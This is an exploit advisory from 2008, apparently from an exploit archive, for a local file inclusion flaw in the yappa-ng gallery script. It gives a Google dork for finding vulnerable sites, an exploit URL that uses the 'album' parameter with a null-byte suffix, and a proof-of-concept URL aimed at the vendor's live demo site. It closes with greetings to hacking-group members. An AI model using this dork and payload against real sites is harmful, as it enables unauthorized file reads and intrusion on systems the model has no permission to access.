yappa-ng <= 2.3.3-beta0 (album) Local File Inclusion Vulnerability

2008-10-19 23:01:07

[o]------------------------------------------------------------------------------------[x]
| Local File Include Vulnerability |
[o]------------------------------------------------------------------------------------[o]
| Software : yappa-ng Version 2.3.2 |
| Vendor : http://www.zirkon.at/zirkon/scripts/yappa-ng/yappa-ng_main_eng.html |
| Date : 19 October 2008 |
| Author : Vrs-hCk |
| Contact : d00r[at]telkom[dot]net |
[o]------------------------------------------------------------------------------------[o]

[»] Google Dork

"Powered by yappa-ng 2.3.2"

[»] Exploit

http://[site]/[yappa-ng-path]/index.php?album=[LFI]%00

[»] Proof of Concept

http://www.zirkon.at/yappa-ng_demo/index.php?album=[LFI]%00

[o]------------------------------------------------------------------------------------[x]
| Greetz |
[o]------------------------------------------------------------------------------------[o]
| All Member oF MainHack BrotherHood - www.MainHack.com - www.ServerIsDown.org |
| Paman, OoN_Boy, NoGe, Fluzy, H312Y, s3t4n, NgL, ScanneD, }^-^{, eminem, |
| loqsa, pizzyroot, xx_user, ^Bradley, ayulina, MaDOnk, nTc, dkk ... |
| c0li.m0de.0n & BeHave oR BeGone !!! |
[o]------------------------------------------------------------------------------------[o]

#

Fixes

No fixes

In order to submit a new fix you need to be registered.